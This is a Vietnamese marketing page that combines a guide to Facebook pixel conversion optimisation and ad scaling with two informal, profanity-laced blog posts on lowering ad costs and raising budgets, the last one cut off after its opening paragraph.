  Nếu bạn chưa có tối thiểu 500 sự kiện pixel hàng tháng, hãy đọc hướng dẫn cơ bản của chúng tôi. Nếu bạn có hơn 10.000 sự kiện pixel hàng tháng, hãy đọc hướng dẫn nâng cao của chúng tôi.

  Thông tin cơ bản

  Trước khi bắt đầu sử dụng tối ưu hoá chuyển đổi, hãy đảm bảo bạn hiểu các thuật ngữ và công cụ liên quan đến kỹ thuật này.

  Chuyển đổi là gì?

  Chuyển đổi là một hành động được thực hiện trên trang web của bạn. Đó có thể là bất cứ hành động nào từ truy cập một trang đến hoàn tất mua hàng.

  “Tối ưu hoá” cho chuyển đổi nghĩa là gì?

  Khi tạo nhóm quảng cáo, bạn phải chọn một sự kiện tối ưu hóa. Lựa chọn này cho hệ thống phân phối của chúng tôi biết nên cố gắng đạt kết quả nào cho bạn. Ví dụ: một số nhà quảng cáo có thể muốn tối ưu hóa cho số lượt click vào liên kết trong khi những người khác có thể muốn tối ưu hóa cho số lượt xem video. Một lợi thế của việc triển khai pixel là bạn có thể yêu cầu hệ thống phân phối tối ưu hóa không chỉ cho số lượt click vào liên kết đến trang web, mà còn cho hành động xảy ra trên trang web của mình.

  Hiểu các công cụ của bạn

  Trước khi bắt đầu tối ưu hóa cho chuyển đổi, bạn nên làm quen với:

  • Các loại sự kiện chuyển đổi có sẵn cho bạn. Bạn phải chọn một chuyển đổi cụ thể để tối ưu hóa – bạn không thể chỉ tối ưu hóa cho chuyển đổi nói chung. Chọn đúng chuyển đổi rất quan trọng (hãy xem thêm thông tin về nội dung này trong phần tiếp theo). Tìm hiểu về hai loại chuyển đổi: sự kiện tiêu chuẩn và chuyển đổi tùy chỉnh.
  • Khoảng thời gian chuyển đổi. Ngoài việc chọn chuyển đổi, bạn phải chọn khoảng thời gian chuyển đổi. Khoảng thời gian chuyển đổi cho chúng tôi biết phải sử dụng chuyển đổi nào để tối ưu hóa phân phối (ví dụ: những chuyển đổi xảy ra trong vòng 1 ngày sau khi hiển thị hoặc 7 ngày sau khi nhấp).
  • Khoảng thời gian ghi nhận. Khoảng thời gian ghi nhận là giá trị tương đương với khoảng thời gian chuyển đổi của hệ thống báo cáo. Để hiểu kết quả của chiến dịch tối ưu hóa chuyển đổi, hãy đảm bảo bạn biết cách tùy chỉnh cột và chọn khoảng thời gian ghi nhận phù hợp với khoảng thời gian chuyển đổi. Điều này cũng rất quan trọng để đảm bảo bạn sẽ nhận được khoảng 50 sự kiện chuyển đổi mà mình đã tối ưu hóa trong khoảng thời gian chuyển đổi (xem thông tin thêm về nội dung này trong phần tiếp theo).

  Bắt đầu tối ưu hóa cho chuyển đổi

  Hãy sử dụng sự hiểu biết về các thuật ngữ và công cụ đó để bắt đầu chạy một số nhóm quảng cáo được tối ưu hóa chuyển đổi. Chúng tôi khuyên bạn nên tiếp tục chạy quảng cáo lưu lượng truy cập và tương tác khi tối ưu hóa chuyển đổi để tiếp tục xây dựng dữ liệu và củng cố đối tượng mục tiêu của mình.

  Lưu ý: Chỉ chọn mục tiêu tiếp thị chuyển đổi không có nghĩa là việc phân phối nhóm quảng cáo sẽ được tối ưu hóa cho chuyển đổi. Bạn phải chọn chuyển đổi cụ thể mình quan tâm trong menu thả xuống của phần “Chuyển đổi” trong công cụ tạo nhóm quảng cáo rồi chọn Chuyển đổi trong menu thả xuống của phần “Tối ưu hóa cho phân phối quảng cáo”.

  Chọn chuyển đổi thích hợp để tối ưu hóa

  Lưu ý rằng khi tối ưu hóa cho các kết quả hiếm hơn (ví dụ: các chuyển đổi hiếm hơn lượt tương tác trên Trang hoặc lượt click vào liên kết đến trang web của bạn), hãy lưu ý rằng số lượng sự kiện tối ưu hóa nên nhận được trong khoảng thời gian chuyển đổi mỗi tuần là khoảng 50 sự kiện. 50 sự kiện này phải đến từ quảng cáo của bạn. Những chuyển đổi không đến từ người xem/nhấp (tùy thuộc vào khoảng thời gian chuyển đổi) vào một trong các quảng cáo của bạn hoặc xảy ra ngoài khoảng thời gian chuyển đổi sẽ không được tính vào con số 50 này. Ví dụ: nếu khoảng thời gian chuyển đổi cho chuyển đổi mua hàng của bạn là 1 ngày sau khi nhấp vào bài viết và ai đó nhấp vào quảng cáo rồi hoàn tất mua hàng ở thời điểm 3 ngày sau khi nhấp, thì chuyển đổi đó sẽ không được tính vào con số 50 này.

  Để chọn đúng chuyển đổi, hãy kiểm tra các sự kiện pixel trước khi bạn thiết lập nhóm quảng cáo. Bạn nên tối ưu hóa cho chuyển đổi xảy ra tối thiểu 100 lần mỗi tháng mà không cần chạy bất kỳ quảng cáo nào. Nếu trang web của bạn không có được số lần chuyển đổi tối thiểu đó khi không quảng cáo thì rất có thể chúng tôi sẽ không thể tìm thấy đủ số người chuyển đổi thông qua quảng cáo để nhóm quảng cáo của bạn thành công. Nếu thấy bất kỳ sự kiện pixel nào bị thiếu số lần chuyển đổi, bạn nên dành nhiều thời gian hơn vào việc thu hút lưu lượng truy cập trang web và xây dựng cơ sở khách hàng.

  Dưới đây là một số tùy chọn tạo nhóm quảng cáo mà chúng tôi khuyên bạn nên dùng thử khi bắt đầu tối ưu hóa thông qua pixel:

  • Số lượt xem trang đích: Chuyển đổi này mang lại lưu lượng truy cập chất lượng cao hơn so với số lượt click vào liên kết vì lượt xem trang đích chỉ xảy ra khi trang (mà bạn muốn chuyển mọi người đến) tải. (Nếu ai đó nhấp vào một liên kết, nhưng sau đó đóng lại trước khi trang tải, thì chúng tôi vẫn tính đó là một lượt click vào liên kết.)
  • Chuyển đổi phổ biến hơn: Giả sử bạn quan tâm nhất đến số lượt mua hàng thì việc tối ưu hóa ngay cho số lượt mua hàng có thể thật hấp dẫn. Tuy nhiên, số lượt mua hàng là loại chuyển đổi hiếm nhất. Đặc biệt khi bạn mới bắt đầu sử dụng pixel để tối ưu hóa chuyển đổi, chúng tôi khuyên bạn nên chọn những loại chuyển đổi phổ biến hơn. Ví dụ: thay vì tối ưu hoá cho số lượt mua hàng, hãy tối ưu hóa cho số lượt thêm vào giỏ hàng hoặc số lượt xem trang. Cả hai sự kiện đều có nhiều khả năng dẫn đến mua hàng hơn việc ai đó tương tác với một bài viết trên Trang, nhưng có thể xảy ra đủ thường xuyên để chúng tôi có thể liên tục giúp bạn thu được kết quả đó (trong khi mua hàng có thể không diễn ra ngay từ đầu).
  • Vị trí quảng cáo tự động: Tùy chọn này cho phép chúng tôi tìm chuyển đổi trên nhóm ứng dụng và dịch vụ của Facebook. Tùy chọn có thể giúp tăng số người bạn tiếp cận và kiểm soát chi phí.

  Tạo đối tượng mục tiêu phù hợp

  Điều này áp dụng cả cho những chiến lược nhắm mục tiêu tương tự mà chúng tôi khuyên dùng trong hướng dẫn giới thiệu của mình. Chúng tôi cũng khuyên bạn nên sử dụng các chiến lược sau:

  • Sử dụng Đối tượng tùy chỉnh từ trang web. Sau khi tích lũy đủ lưu lượng truy cập trang web, bạn có thể tạo Đối tượng tùy chỉnh gồm những người truy cập trang web của mình. Đây là một công cụ tuyệt vời vì bạn không cần liên tục tải lên các tệp mới – chúng tôi sẽ duy trì cập nhật cho đối tượng của bạn dựa trên những người truy cập trang web của bạn.
  • Sử dụng nhắm mục tiêu chi tiết. Nhắm mục tiêu mọi người dựa trên sở thích của họ (chứ không chỉ thông tin nhân khẩu học) thường mang lại hiệu quả cao hơn cho tối ưu hóa chuyển đổi. Bạn cũng có thể nghĩ về những đặc điểm mà đối thủ cạnh tranh có thể nhắm mục tiêu và cũng sử dụng (để cạnh tranh) hoặc tránh sử dụng các đặc điểm đó (để tìm đối tượng thích hợp của riêng mình).Chúng tôi đặc biệt khuyên bạn nên sử dụng tính năng mở rộng nhắm mục tiêu kết hợp với nhắm mục tiêu chi tiết. Tính năng này cho phép hệ thống của chúng tôi hiển thị quảng cáo của bạn cho những người không thuộc các tiêu chí mà bạn đã chọn trong nhắm mục tiêu chi tiết nếu chúng tôi nghĩ rằng điều đó sẽ giúp chúng tôi mang lại cho bạn nhiều chuyển đổi hơn. Tính năng này cho phép bạn thử một số tùy chọn nhắm mục tiêu dựa trên sở thích cụ thể, đồng thời giảm nguy cơ ảnh hưởng tiêu cực đến hiệu quả nếu các lựa chọn của bạn quá mức hạn chế.
  • Sử dụng nhắm mục tiêu xuyên biên giới: Nếu sản phẩm của bạn có thể sử dụng hoặc được giao hàng trên toàn cầu, Facebook cung cấp các tùy chọn nhắm mục tiêu khu vực và toàn thế giới. Các tùy chọn này có thể mở rộng rất nhiều phạm vi tiếp cận của chiến dịch, mang lại hàng loạt kết quả mới (và có thể tốt hơn). Bạn có thể yêu cầu chúng tôi phân phối quảng cáo trên toàn thế giới hoặc yêu cầu chúng tôi phân phối quảng cáo ở các khu vực cụ thể (ví dụ: châu Âu, châu Á) hoặc các khu vực mậu dịch tự do (ví dụ: NAFTA).

  Chọn chiến lược giá thầu phù hợp

  Khi bắt đầu chuyển sang tối ưu hóa chuyển đổi, bạn có thể xem xét điều chỉnh chiến lược giá thầu cho phù hợp. Kết quả mà bạn tối ưu hóa đang tiến dần đến kết quả kinh doanh thực, nghĩa là bạn có thể chỉ định giá trị phù hợp hơn cho các kết quả đó. Bạn có thể cung cấp giá trị này cho hệ thống phân phối của chúng tôi dưới dạng chi phí mục tiêu hoặc giới hạn giá thầu. Các giá trị này là một phần tương ứng của chiến lược giá thầu chi phí mục tiêu và chiến lược giá thầu chi phí thấp nhất. Nhờ đó, hệ thống phân phối của chúng tôi có được thông tin hữu ích để tinh chỉnh thêm các loại kết quả mong muốn phù hợp với mục tiêu của bạn.

  Việc sử dụng chiến lược giá thầu chi phí thấp nhất mà không có giới hạn giá thầu vẫn là một tùy chọn, nhưng một số nhà quảng cáo muốn có thêm quyền kiểm soát đối với hiệu quả khi họ bắt đầu sử dụng các kỹ thuật tiên tiến hơn này.Thiết lập đúng mục tiêu chi phí hoặc giới hạn giá thầu

  Nếu chọn sử dụng mục tiêu chi phí hoặc giới hạn giá thầu, bạn cần tính toán số tiền cần đặt. Chúng tôi không thể cho bạn biết chính xác giá trị cần đặt, nhưng đây là một số yếu tố bạn cần xem xét:

  • Giá trị của một chuyển đổi đối với bạn trong khoảng thời gian chuyển đổi chính là điểm khởi đầu tốt – dù là giá trị trung bình (mục tiêu chi phí) hay tối đa (giới hạn giá thầu). Hãy thử bắt đầu với giá trị này và tăng lên nếu bạn chưa hài lòng với hiệu quả.
  • Khi tính toán giá trị của một chuyển đổi đối với bạn, hãy xem xét cả giá trị trọn đời. Ví dụ: nếu bạn thu hút được khách hàng mới mua gì đó, thì điều đó cũng có thể dẫn đến việc mua hàng trong tương lai. Bạn phải tính đến cả giá trị đó.
  • Lưu ý cách hoạt động của mỗi chiến lược giá thầu và đấu giá quảng cáo: Mục tiêu chi phí yêu cầu hệ thống của chúng tôi đặt giá thầu cho kết quả bằng chi phí trung bình gần với mục tiêu của bạn nhất có thể. Nếu bạn sử dụng mục tiêu chi phí, hãy thiết lập số tiền trung bình mà bạn thực sự muốn (hoặc có thể) chi trả. Giới hạn giá thầu đưa ra số tiền tối đa mà chúng tôi sẽ đặt giá thầu cho bạn và giá thầu không giống với chi phí của kết quả. Trên thực thế có rất nhiều trường hợp mà số tiền bạn phải trả cuối cùng lại thấp hơn giá thầu của mình. Do vậy, hãy xem xét đặt giới hạn giá thầu ở mức tối đa mà bạn sẵn sàng thanh toán cho bất kỳ chuyển đổi nhất định nào.

  Hiểu kết quả của bạn

  Để cải thiện và duy trì kết quả, bạn cần đảm bảo mình đang phân tích chính xác kết quả. Hãy đọc hướng dẫn của chúng tôi để phân tích kết quả của chiến dịch tối ưu hóa chuyển đổi.

  Bước tiếp theo

  Nếu thử nghiệm với các chiến lược này, bạn sẽ tìm ra chiến lược phù hợp với mình và cuối cùng nhận được hơn 10.000 sự kiện pixel trên trang web mỗi tháng. Sau khi thực hiện được mục tiêu này, hãy đọc hướng dẫn nâng cao của chúng tôi về cách mở rộng và tinh chỉnh chiến dịch.

  Hướng dẫn nâng cao: Tăng doanh số trên trang web bằng pixel

  Nếu bạn đã triển khai pixel, muốn tăng doanh số trên trang web, đang nhận được hơn 10.000 sự kiện pixel hàng tháng, đã phát triển thành công một số chiến lược tối ưu hóa chuyển đổi và đang tìm cách mở rộng các chiến dịch tối ưu hóa chuyển đổi, thì đây là hướng dẫn dành cho bạn. Hướng dẫn này chỉ cho bạn cách tối đa hoá năng suất và hiệu quả của chiến dịch khi tăng ngân sách và biến chúng thành trọng tâm của chiến lược quảng cáo.

  Nếu bạn chưa có tối thiểu 500 sự kiện pixel hàng tháng, hãy đọc hướng dẫn cơ bản của chúng tôi. Nếu bạn có từ 500 đến dưới 10.000 sự kiện pixel hàng tháng, hãy đọc hướng dẫn trung cấp của chúng tôi.

  Mở rộng và tinh chỉnh chiến dịch

  Với lượng dữ liệu ổn định, cơ sở khách hàng mạnh và cơ sở của các thử nghiệm thành công, bạn đã sẵn sàng để mở rộng các chiến dịch tối ưu hóa chuyển đổi của mình. Trong quá trình này, bạn cần tinh chỉnh chiến dịch để đảm bảo có thể chi tiêu mức ngân sách cao hơn và tối đa hóa giá trị nhận được. Bạn có thể thực hiện điều này thông qua việc cải thiện cấu trúc chiến dịch và đối tượng mục tiêu, thử nghiệm và sử dụng nhiều tính năng của pixel hơn.

  Củng cố cấu trúc chiến dịch

  Khi nhà quảng cáo tăng quy mô và sự phức tạp của quảng cáo tối ưu hoá chuyển đổi, họ thường muốn tách chiến dịch thành nhiều nhóm quảng cáo rất cụ thể dựa trên các lát đối tượng mục tiêu khác nhau. Tuy nhiên, điều này có thể dẫn đến hiệu quả thấp. Chúng tôi khuyên bạn chỉ nên tạo một nhóm quảng cáo mới nếu bạn đang cố gắng kiểm soát các chi phí khác nhau dựa trên đối tượng hoặc kết quả mong muốn của mình. Nếu không, hãy kết hợp các đối tượng mục tiêu vào một nhóm quảng cáo có ngân sách lớn hơn. Dưới đây là 2 ví dụ giải thích lý do:

  • Mỗi nhóm quảng cáo đều tích lũy dữ liệu. Để Facebook có thể phân phối nhóm quảng cáo ổn định và hiệu quả thì nhóm quảng cáo đó (không phải chiến dịch) cần đạt khoảng 50 chuyển đổi đã tối ưu hóa. Nếu bạn có 10 nhóm quảng cáo, mỗi nhóm thu được 5 lượt chuyển đổi một tuần, bạn sẽ có 50 lượt chuyển đổi nhưng 10 nhóm quảng cáo lại không đủ dữ liệu và có thể bị dừng phân phối. Thay vào đó, nếu bạn có 1 nhóm quảng cáo với 50 lượt chuyển đổi, chiến dịch của bạn cũng có 50 lượt chuyển đổi thì nhóm quảng cáo có đủ dữ liệu sẽ bắt đầu phân phối ổn định và hiệu quả hơn.
  • Giả sử cần $100 để có đủ chuyển đổi để bắt đầu phân phối nhóm quảng cáo ổn định và hiệu quả. Nếu bạn có 10 nhóm quảng cáo được tối ưu hóa cho chuyển đổi với ngân sách $100 thì trong tình huống tốt nhất, bạn sẽ chi tiêu $1000 để thu thập dữ liệu và $0 để phân phối một cách tối ưu. Nếu bạn có 1 nhóm quảng cáo với ngân sách $1000, thì $100 được chi để thu thập dữ liệu còn $900 được chi để phân phối một cách tối ưu.

  Lưu ý: Bạn có thể cho rằng mặc dù có thông tin trên nhưng bạn vẫn muốn phân khúc chiến dịch thành nhiều nhóm quảng cáo nhỏ để xem nhóm nào hiệu quả nhất rồi sử dụng nhóm đó làm mô hình cho nhóm quảng cáo trong tương lai. Tuy nhiên, với nhiều nhóm quảng cáo như vậy, bạn khó có khả năng thu được số kết quả có ý nghĩa thống kê cho bất kỳ nhóm quảng cáo nào. Vì thế, các nhóm này có thể không phải là mô hình để sử dụng trong tương lai.

  Mở rộng đối tượng mục tiêu

  Khi bạn tăng số tiền chi tiêu cho tối ưu hóa chuyển đổi, bạn có thể cần mở rộng đối tượng mục tiêu của mình. (Lý do là vì chúng tôi cần tìm thêm kết quả để chi tiêu và bạn có thể khiến các đối tượng hiện tại của mình “mệt mỏi”sau một thời điểm nhất định, nghĩa là mọi người trong đối tượng đó dừng phản hồi quảng cáo của bạn.)

  Công cụ tốt nhất để thực hiện việc này là đối tượng tương tự. Đối tượng tương tự gồm những người có đặc điểm tương tự như “đối tượng nguồn”. Bất kỳ đối tượng nào khác bạn đã lưu đều có thể sử dụng làm nguồn cho đối tượng tương tự. Đối tượng tương tự cho phép bạn tiếp tục dựa vào thành công của đối tượng nguồn ngay cả khi bạn đã tiếp cận mọi người trong đó.

  Sau đây là một số mẹo sử dụng đối tượng tương tự để tối ưu hóa chuyển đổi:

  • Tránh nguồn đối tượng tương tự rộng. Các nguồn như những người đã truy cập trang web không phải là nguồn lý tưởng cho nhóm quảng cáo được tối ưu hóa chuyển đổi. Chúng tôi thường khuyên tránh những nguồn này vì những nguồn này không phân biệt được khách hàng tuyệt vời với khách hàng bình thường. Mọi người chỉ được nhóm lại với nhau. Hãy sử dụng bất kỳ dữ liệu độc quyền nào mà bạn có để giúp bạn phân biệt. Nếu bạn không có nhiều dữ liệu, hãy thử phân chia khách hàng theo số sự kiện pixel. Hãy tạo đối tượng tương tự từ nguồn gồm các khách hàng đã thực hiện hành động bạn quan tâm nhất.
  • Chất lượng nguồn quan trọng hơn kích thước nguồn. Nói chung, nguồn đối tượng tương tự nằm trong khoảng từ 1.000 đến 50.000 người là lý tưởng. Tuy nhiên, có nguồn chất lượng cao (nghĩa là nguồn gồm những khách hàng tốt nhất của bạn) còn quan trọng hơn bất kỳ con số cụ thể nào. Ví dụ: nếu nguồn tốt thì 20.000 hay 30.000 người cũng không quan trọng. Thậm chí, bạn có thể thành công với 100 người.
  • Mở rộng trên một nguồn chất lượng cao thay vì sử dụng nhiều nguồn tương tự. Ví dụ: nếu bạn có nguồn chất lượng cao và đã tạo đối tượng tương tự gồm những người giống nguồn đó nhất (giả sử 1% hàng đầu), chúng tôi khuyên bạn nên mở rộng trên nguồn đó (giả sử kết hợp 2% hàng đầu) thay vì cố tạo nguồn tương tự khác và nhắm mục tiêu những người giống nguồn đó nhất. Tìm hiểu thêm về tùy chọn đối tượng tương tự nâng cao.
  • Tránh sử dụng phần nhắm mục tiêu bổ sung ở trên đối tượng tương tự. Đối tượng tương tự đã tích hợp các thông tin như độ tuổi, giới tính và sở thích từ nguồn của bạn. Việc dùng các thông số khác cùng với những thông tin đó có khả năng làm xáo trộn phần nhắm mục tiêu của bạn chứ không cải thiện phần này. (Tuy nhiên, nếu bạn sử dụng nhắm mục tiêu bổ sung, hãy đảm bảo sử dụng mở rộng nhắm mục tiêu để tăng tối đa tính linh hoạt cho hệ thống phân phối của chúng tôi.)

  Đọc câu chuyện về các doanh nghiệp đã thành công với đối tượng tương tự.

  Tối ưu hóa cho các sự kiện pixel gần với mục tiêu thực sự của bạn hơn

  Khi nhiều người truy cập trang web của bạn hơn và thực hiện nhiều hành động tại đó hơn, bạn sẽ có nhiều sự kiện pixel hơn để tối ưu hóa thành công. Bạn nên cố gắng tối ưu hóa cho mọi sự kiện xảy ra tối thiểu 100 lần mỗi tháng mà không cần chạy quảng cáo tối ưu hóa cho sự kiện đó. Ví dụ: nếu bạn đang tối ưu hóa cho sự kiện xem trang nhưng có đủ số sự kiện thêm vào giỏ hàng hoặc mua hàng, hãy thử tối ưu hóa cho một trong các sự kiện đó thay thế. Tối ưu hóa cho sự kiện gần với mục tiêu thực của bạn hơn sẽ giúp bạn đạt được nhiều giá trị hơn từ quảng cáo của mình.

  Thử nghiệm các chiến lược

  Bạn cần thử nghiệm những cách tiếp cận khác nhau để tối ưu hóa chuyển đổi nhằm đảm bảo thu được giá trị tối đa từ quảng cáo. Nếu có thể, chúng tôi khuyên bạn nên chạy thử nghiệm phân tách. Hãy xem lại thực tiễn tốt nhất về thử nghiệm phân tách của chúng tôi trước khi thực hiện.

  Nếu không thể chạy thử nghiệm phân tách, bạn vẫn có thể thu được thông tin hữu ích từ các thử nghiệm thủ công theo những nguyên tắc sau:

  • Sử dụng giới hạn giá thầu hoặc chi phí mục tiêu khi thử nghiệm.
  • Chạy thử nghiệm trong tối thiểu từ 1-2 tuần.
  • Hãy nhớ rằng bạn phải chi tiêu nhiều tiền để tiến hành thử nghiệm thích hợp. Ví dụ: nếu bạn đang thử nghiệm thứ gì đó với ngân sách $50 và giá thầu $30, có thể bạn chưa chi tiêu đủ để nhận được kết quả có ý nghĩa thống kê.
  • Cách thử nghiệm nội dung: Thay vì thử nghiệm 5 nhóm quảng cáo với 1 biến trên mỗi nội dung, hãy tạo 1 nhóm quảng cáo với 5 biến. Chúng tôi sẽ tự động tìm ra nhóm nào hoạt động tốt nhất và bạn có thể xem thông tin này trong báo cáo.

  Dưới đây là một số ví dụ về các biến mà bạn có thể muốn thử nghiệm.

  • Hình ảnh tĩnh với video (hoặc các biến khác trong nội dung)
  • Đối tượng tương tự dựa trên danh sách khách hàng với đối tượng tương tự dựa trên lưu lượng truy cập vào trang web
  • Các khoảng thời gian chuyển đổi khác nhau (ví dụ: 7 ngày sau khi nhấp với 7 ngày sau khi nhấp hoặc 1 ngày sau khi xem)

  Quan trọng: Hãy nhớ rằng bạn không thể thử nghiệm và tối ưu hóa cùng một lúc. Việc đặt hạn chế cho hệ thống phân phối của chúng tôi để thử nghiệm chạy tốt sẽ ngăn hệ thống chọn kết quả tốt nhất từ toàn bộ tùy chọn. Chúng tôi hoàn toàn ủng hộ việc thử nghiệm nhằm giúp bạn tìm ra các chiến lược tốt nhất. (Thậm chí, chúng tôi khuyên bạn luôn dành một phần ngân sách của mình cho thử nghiệm để biết điều gì đang xảy ra trong thị trường quảng cáo động của chúng tôi và thử nghiệm các tính năng mới). Tuy nhiên, nếu bạn cần thực hiện một thử nghiệm quan trọng, hãy làm đúng rồi hành động dựa trên kết quả. Hãy để hệ thống phân phối của chúng tôi tối ưu hóa dựa trên những gì bạn đã biết.

  Khai thác thêm pixel của bạn

  Khi tinh chỉnh chiến lược tối ưu hóa chuyển đổi và tăng ngân sách, hãy cân nhắc sử dụng một số tính năng sau của pixel:

  • Chuyển đổi tùy chỉnh. Việc triển khai các chuyển đổi này cho phép bạn:
   • Đo lường xác thực hơn. Theo dõi nhiều tín hiệu hơn mang lại cho bạn nhiều thông tin chi tiết hơn về nơi những người bạn tiếp cận đang lần lượt bỏ đi trong phễu marketing của mình. Thông tin này có thể giúp bạn cải thiện trang web của mình. Có thể quy trình trải nghiệm đăng nhập hoặc duyệt của bạn đang ngăn mọi người mua hàng. Sau khi bạn thực hiện những cải tiến cần thiết, quảng cáo của bạn sẽ hiệu quả hơn nữa.
   • Nhắm mục tiêu lại những người đã bỏ đi trước khi chuyển đổi. Việc thêm chuyển đổi tùy chỉnh cũng tạo thêm cơ hội để thu hút những người chuyển đổi tiềm năng bỏ đi trước khi đạt được kết quả mong muốn của bạn. Bạn có thể tiếp cận những người đó bằng cách tạo đối tượng gồm những người đã (hoặc chưa) hoàn tất một chuyển đổi tùy chỉnh nhất định.
  • Tối ưu hóa giá trị. Nếu pixel của bạn đã triển khai sự kiện tiêu chuẩn Mua hàng và đang gửi cho chúng tôi các thông số giá trị và đơn vị tiền tệ (tìm hiểu cách thiết lập), bạn có thể tối ưu hóa cho giá trị. Điều này nghĩa là chúng tôi sẽ hiển thị quảng cáo của bạn cho những người mà chúng tôi cho rằng không chỉ mua hàng của bạn mà còn mua hàng với lợi nhuận trên chi tiêu quảng cáo cao nhất có thể.
  • Quảng cáo động. Nếu thiết lập danh mục, bạn có thể kết hợp danh mục đó với pixel của mình để chạy quảng cáo động. Quảng cáo động cho phép bạn tạo mẫu quảng cáo tự động sử dụng hình ảnh và chi tiết từ nguồn cấp dữ liệu của danh mục để hiển thị quảng cáo cho những người đã thể hiện sự quan tâm đến doanh nghiệp của bạn.

  Okie, đó là tất cả những thứ cơ bản và đúng nhất mà các bạn cần biết về pixel cũng như các cách tốt nhất để thúc đẩy doanh số thông qua chuyển đổi. Chúc các bạn một tháng cuối năm thu được nhiều thắng lợi.

 • Kỹ Thuật: 3 bước tối ưu hóa Facebook ads giảm 50% giá quảng cáo

  Xin chào các bạn, trong bài viết này tôi sẽ không nói về tối ưu nội dung + hình ảnh, mà sẽ chỉ có kỹ thuật 3 bước giúp các bạn ngay lập tức giảm chi phí quảng cáo trên tài khoản của các bạn BỀN VỮNG.

  Tôi dám chắc rằng các thầy giáo dạy phây búc sẽ không vui khi tôi chia sẻ điều này, vì lý thuyết đa số họ đang dạy sẽ bị xô đổ. Hiện nay có rất nhiều bạn phải bỏ ra khá nhiều tiền, chỉ để đi học những kỹ thuật CỐ TÌNH LÀM PHỨC TẠP lên của các thầy cho có vẻ nguy hiểm, thu học phí cho cao =))

  Lướt nhanh về bản chất phân phối quảng cáo của phây búc nhé, nó chỉ gói gọn trong 4 chữ ” NGẪU NHIÊN TỨC THỜI “. Đéo một ai ( bao gồm cả các thầy hay Mác xoăn ) có thể dám chắc 100% việc khách hàng phút này nhìn thấy quảng cáo có đúng lúc họ cần mua hay xuất hiện ý định hành vi mua hàng hay không.

  Thế nên, đừng lấy làm lạ sau khi đi học các thầy dạy về các kiểu tối ưu ngang, tối ưu dọc, tối ưu độ tuổi, tối ưu vùng miền v…v… của các thấy và làm theo, tệp khách hàng của các bạn còn lại một nhúm bé tẹo. Lên camp bán hàng ngon được vài ngày đầu xong xịt như chó =)) càng vê sau, càng nhập thêm hàng càng buff thêm tiền thì càng ế hàng =))

  OK bây giờ chúng ta bắt đầu mở tài khoản ads ra và click vài cái để trở thành siêu anh hùng nào ^^

  Bước 1: Tối ưu nguồn phân phối quảng cáo

  Giá thầu /1 tương tác của các bạn bị ảnh hướng rất lớn bởi giá CPM ( Giá phải trả cho 1000 lần hiền thị quảng cáo ) Bởi vậy việc dễ dàng nhất lúc ban đầu là các bạn chỉ việc tập trung ngân sách vào nguồn phân phối quảng cáo nào CÓ LỢI NHẤT. Với cách hiển thị quảng cáo hiện nay của phây búc thì đương nhiên newfeed chính là nguồn phân phối quảng cáo có chỉ số hiệu quả cao nhất. CÒN CÁC CÁI KHÁC CÓ HAY KHÔNG CÓ ĐÉO QUAN TRỌNG =))

  Chọn giống như hình, done !

  Bước 2: Tối ưu tần suất quảng cáo.

  Các bạn có biết ngay cả khi số lượng user lên đến cả trăm triệu, nhưng anh mác xoăn vẫn … không thèm làm quảng cáo để thu tiền ngay ? Lý do vì nền tảng cộng đồng online phát triển bền vững được là khi người dùng cảm thấy ít bị làm phiền nhất. Đấy cũng là một suy nghĩ chiến lược rất thành công của anh Mác xoăn, đã khiến cho phây búc trở thành một đế chế ads hùng mạnh như bây giờ.

  Tôi giả thiết rằng, tệp khách hàng của tôi là 60.000 người. Kết quả hàng ngày ước tính tiếp cận của tôi là 2500 người. Vậy nếu quảng cáo của tôi có điểm phù hợp đẹp nhất 9 – 10 điểm, thì không có gì thay đổi sau 60.000/2500 = 24 ngày quảng cáo của tôi sẽ có điểm tần suất lặp lại là 1,3 – 2 ( 1 người nhìn thấy 2 lần 1 quảng cáo ).

  Lúc này điều gì xảy ra ? GIÁ TƯƠNG TÁC CỦA TÔI TĂNG CHÓNG CMN MẶT –  Vì lúc này anh hệ thống quảng cáo đánh giá tôi ĐANG LÀM PHIỀN NGƯỜI DÙNG. 

  Giải pháp: Các bạn hãy để tệp khách hàng rộng nhất có thể so với ngân sách quảng cáo, đừng cố gắng tối ưu chia tệp đéo gì nhiều cả. Tính toán một chiến dịnh làm sao, để chỉ số tần suất trong khoảng thời gian chạy chiến dịch luôn ở mức dưới 1,3.

  Trong ví dụ ở dưới các bạn có thể thấy, điểm phù hợp quảng cáo của tôi là 9 ( sau khi tối ưu hình ảnh và nội dung ). Với 1 tệp 1,6 triệu người so với kết quả hàng ngày ước tính 2500 người, chỉ số tần suất của tôi sẽ mất…640 ngày mới bị thay đổi tần suất quảng cáo dẫn đến giá tương tác leo thang.

  Tất nhiên, cái gì cũng có tương đối, có thể qua một thời gian chạy ads, điểm phù hợp của tôi thay đổi do tệp user ngẫu nhiên của ngày mai kém tương tác với bài viết làm cho giá thầu có thay đổi. Tuy nhiên chúng ta vẫn còn bước thứ 3 cần tối ưu…

  Bước 3: Tối ưu tệp khách hàng ngẫu nhiên tức thời ( tối ưu nhóm quảng cáo )

  Khi tạo chiến dịch, để tránh việc quảng cáo bị phân phối đến nhưng tệp khách hàng không NGON nằm trong một tệp khách hàng rộng. Các bạn chỉ việc tạo nhiều nhóm quảng cáo hàng loạt có cùng tệp khách hàng rộng nhất có thể, đừng sợ việc bị phân phối trùng lặp. Vì thuật toán của phây búc rất thông minh, nó sẽ tự động phân phối đến NGƯỜI DÙNG QUAN TÂM TẠI THỜI ĐIỂM PHÂN PHỐI.

  Cụ thể hơn, các bạn có thể tạo ra khoảng 5-7 nhóm quảng cáo. Theo dõi khoảng 1 – 2 ngày và tắt bớt các nhóm quảng cáo có giá thầu cao,

  Công thức để tính ngân sách cho một chiến dịch khi chạy nhiều nhóm quảng cáo như sau:

  Ví dụ tôi cần chạy 2,5tr / ngày, tôi sẽ lên 7 nhóm quảng cáo có ngân sách 500k / hàng ngày. Sau 1 ngày tôi tắt đi 2 nhóm có giá thầu cao nhất, giữ lại 5 nhóm có giá thầu rẻ nhất và ra nhiều comment nhất thì cho chạy hết số ngày định trước của chiến dịch.

 • KỸ THUẬT x10 – x20 ngân sách quảng cáo

  Chưởng môn Long sắt xin chào quý bạn và các vị, Tôi dám chắc rằng hầu hết các ace đang đọc bài này đi học thầy/chuyên gia/ thánh phây búc làm theo hướng dẫn ở lớp thì… có lãi rất thần kỳ. Nghĩa là bỏ ra số tiền quảng cáo rất nhỏ 200k 500k/ ngày thì có khi lãi ngay trên lớp cả triệu! ( lãi 200% – 2000% ấy chứ)

